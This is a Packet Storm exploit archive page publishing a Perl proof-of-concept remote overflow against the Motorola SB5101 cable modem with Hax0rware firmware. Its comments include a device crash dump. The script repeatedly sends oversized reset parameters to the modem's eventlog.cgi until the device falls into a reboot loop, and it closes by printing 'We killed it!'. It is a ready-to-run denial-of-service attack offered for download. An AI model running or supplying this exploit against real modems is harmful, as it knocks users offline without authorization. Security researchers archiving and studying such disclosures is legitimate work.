what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Motorola SB5101 Hax0rware Event Reset Remote Overflow

Motorola SB5101 Hax0rware Event Reset Remote Overflow
Posted Jun 9, 2010
Authored by Dillon Beresford

Motorola SB5101 Hax0rware event reset remote overflow exploit.

tags | exploit, remote, overflow
SHA-256 | 532fb9884b7cc9cda3a400d902285594780f8388a8a9e422be8e5b934d9f7dfb

Motorola SB5101 Hax0rware Event Reset Remote Overflow

Change Mirror Download
#!/usr/bin/perl

# Motorola SB5101 Hax0rware Event Reset Remote Overflow
# Tested on Hax0rware 1.1 R30, R32 and R39
# Author: Dillon Beresford
# Date: 6/6/2010
# Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ).
# Software Link: http://www.sbhacker.net/forum/index.php
# Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow
# An unauthenticated attacker could send multiple log reset requests to eventlog.cgi,
# causing a a denial of service, which would send the cable modem into a reboot loop.
# For debugging telnet into the device 192.168.100.1 and run the poc.

# >>> YIKES... looks like you may have a problem! <<<

# r0/zero=00000000 r1/at =80510000 r2/v0 =00000000 r3/v1 =00000002
# r4/a0 =ac100102 r5/a1 =00000000 r6/a2 =00000001 r7/a3 =8069b914
# r8/t0 =00000001 r9/t1 =00000000 r10/t2 =00000001 r11/t3 =00000000
# r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005
# r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90
# r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017
# r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c
# r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24

# PC : 0x80197e14 error addr: 0xac100102
# cause: 0x00000010 status: 0x1000ff03

# BCM interrupt enable: fffffff7, status: 00000000
# Instruction at PC: 0x8c830000

# entry 80197c58 called from 801dbe10
# entry 801dbd08 called from 80242f64
# entry 80242eb8 called from 802fb2e4
# entry 802fb2ac called from 802fb2a4
# entry 802fb2ac Return address (00000000) invalid. Trace stops.

# Task: NetToMedia Thread
# ---------------------------------------------------
# ID: 0x0025
# Handle: 0x8069ba24
# Set Priority: 23
# Current Priority: 23
# State: SUSP
# Stack Base: 0x8069a9b0
# Stack Size: 4096 bytes
# Stack Used: 1088 bytes
# Stack Stack Stack
# TaskId TaskName Priority State Size Used Margin
# ---------- -------------------------------- -------- -------- -------- -------- --------
# 0x8048f818 Idle Thread 31 RUN 2048 1064 984
# 0x805131d0 Network alarm support 6 SLEEP 2256 1232 1024
# 0x804924c8 Network support 7 SLEEP 8192 1824 6368
# 0x80513f20 pthread.00000800 15 EXIT 7852 1104 6748
# 0x8048a1c8 tStartup 18 SLEEP 12288 5208 7080
# 0x8054b9ac Rajko HttpD 23 SLEEP 3280 2164 1116
# 0x807f579c NonVol Device Async Helper 25 SLEEP 3072 504 2568
# 0x807ebc7c Motorola Standby Switch Thread 23 SLEEP 4096 440 3656
# 0x807ea984 Motorola Vendor Ctl Thread 23 SLEEP 4096 512 3584
# 0x807f64e8 WDOG 17 RUN 5120 2784 2336
# 0x807e8eb0 BFC Ping Thread 29 SLEEP 6144 476 5668
# 0x807e870c ConsoleThread 27 RUN 36864 2168 34696
# 0x807d6c58 TelnetD 23 RUN 2256 2040 216
# 0x807ca564 CfgVB Thread 23 SLEEP 4096 516 3580
# 0x807c5400 DHCM 25 SLEEP 16384 516 15868
# 0x807bf390 Event 25 SLEEP 0 0 0 OVERFLOW
# 0x8079a900 Time Of Day Thread 23 SLEEP 6144 460 5684
# 0x8079ad70 CmDocsisIpThread 23 SLEEP 8192 508 7684
# 0x80793edc CmBpiManagerThd 25 SLEEP 8192 512 7680
# 0x8079035c CmDsxHelper 23 SLEEP 8192 508 7684
# 0x807ac334 CmDocsisCtlThread 21 SLEEP 8192 516 7676
# 0x80789228 Scan Downstream Thread 23 SLEEP 4096 1416 2680
# 0x80786004 RateShaping Thread 23 SLEEP 4096 448 3648
# 0x807f65e0 CMHL 23 SLEEP 4500 372 4128
# 0x807f66d8 CMHH 21 SLEEP 4500 356 4144
# 0x807f67d0 ENRX 23 SLEEP 4500 1248 3252
# 0x807f68c8 ENTX 23 SLEEP 4500 788 3712
# 0x807f69c0 ELNK 23 SLEEP 4500 324 4176
# 0x807f6ab8 USTX 23 SLEEP 4500 344 4156
# 0x807f6bb0 USRX 23 SLEEP 4500 376 4124
# 0x807f6ca8 UBCT 19 SLEEP 4500 360 4140
# 0x807f6da0 USRN 23 SLEEP 4500 344 4156
# 0x806a5e18 DHCP Client Thread 23 SLEEP 12288 512 11776
# 0x807f6e98 IpHalIst 23 RUN 4500 816 3684
# 0x8069ff7c CmPropaneCtlThread 23 SLEEP 8192 1632 6560
# 0x8069d320 IGMP Thread 23 SLEEP 4096 460 3636
# 0x8069ba24 NetToMedia Thread 23 SUSP 4096 1088 3008
# 0x8069798c Trap Thread 23 SLEEP 16384 504 15880
# 0x807f6030 SNMP Thread 23 SLEEP 20480 1196 19284
# 0x805aaf20 DHCP Server Thread 23 SLEEP 8192 1448 6744
# 0x8047b410 tNonVolTimer 30 SLEEP 2048 292 1756

# * *
# *** ***
# *** ***
# *** ***
# ***** *****
# ***** *****
# ***** *****
# ******* *******
# ******* *******
# ******* *******
# ********* *********
# ********* *********
# **** *** *** ****
# *** *** ***
# *** * ***
# ** **
# ** **
# ** **
# ** **
# * *
# Motorola Corporation

# +----------------------------------------------------------------------------+
# | _/_/ _/_/_/_/ _/_/ |
# | _/ _/ _/ _/ _/ Broadband |
# | _/ _/ _/ _/ |
# | _/_/ _/_/_/ _/ Foundation |
# | _/ _/ _/ _/ |
# | _/ _/ _/ _/ _/ Classes |
# | _/_/_/ _/ _/_/ |
# | |
# | Copyright (c) 1999 - 2007 Broadcom Corporation |
# | |
# | Revision: 3.9.33.3 RELEASE |
# | |
# | Features: Console Nonvol Fat HeapManager SNMP Networking USB1.1 |
# +----------------------------------------------------------------------------+
# | Standard Embedded Target Support for BFC |
# | |
# | Copyright (c) 2003 - 2007 Broadcom Corporation |
# | |
# | Revision: 3.0.1 RELEASE |
# | |
# | Features: PID=0xc011 Bootloader-Rev=2.1.6d |
# | Copyright (c) 2003 - 2007 Broadcom Corporation |
# | |
# | Revision: 3.0.1 RELEASE |
# | |
# | Features: PID=0xc011 Bootloader-Rev=2.1.6d |
# | Features: Bootloader-Compression-Support=0x19 |
# +----------------------------------------------------------------------------+
# | eCos BFC Application Layer |
# | |
# | Copyright (c) 1999 - 2007 Broadcom Corporation |
# | |
# | Revision: 3.0.2 RELEASE |
# | |
# | Features: eCos Console Cmds, (no Idle Loop Profiler) |
# +----------------------------------------------------------------------------+
# | _/_/ _/ _/ |
# | _/ _/ _/_/ _/_/ DOCSIS Cable Modem |
# | _/ _/ _/ _/ |
# | _/ _/ _/ |
# | _/ _/ _/ |
# | _/ _/ _/ _/ |
# | _/_/ _/ _/ |
# | |
# | Copyright (c) 1999 - 2005 Broadcom Corporation |
# | |
# | Revision: 3.9.33.3 RELEASE |
# | |
# | Features: AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
# | Features: Support CM Vendor Extension |
# +----------------------------------------------------------------------------+
# | Motorola Data-Only CM Vendor Extension |
# | |
# | Revision: 3.0.0a RELEASE |
# | |
# | Features: DHCP Server HTTP Server |
# +----------------------------------------------------------------------------+
# | Build Date: Apr 29 2009 |
# | Build Time: 15:08:51 |
# | Built By: vobadm02 |
# +----------------------------------------------------------------------------+

use LWP::Simple;

my $junk = "\x31" x 8096;

print "+---------------------------------------------------------------+\n".
"| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\n".
"| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n".
"| Version: 1.1 R30, R32 and R39 |\n".
"| Vendor: Motorola Corporation and SBHacker |\n".
"| Author: Dillon Beresford |\n".
"| Date: 6/6/2010 |\n".
"+---------------------------------------------------------------+\n";

for ($count = 1; $count < 256; $count++)
{
$contents = get("http://192.168.100.1/eventlog.cgi?reset=".$junk);
print "sending request to cable modem\n";
}

print "We killed it!\n";
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close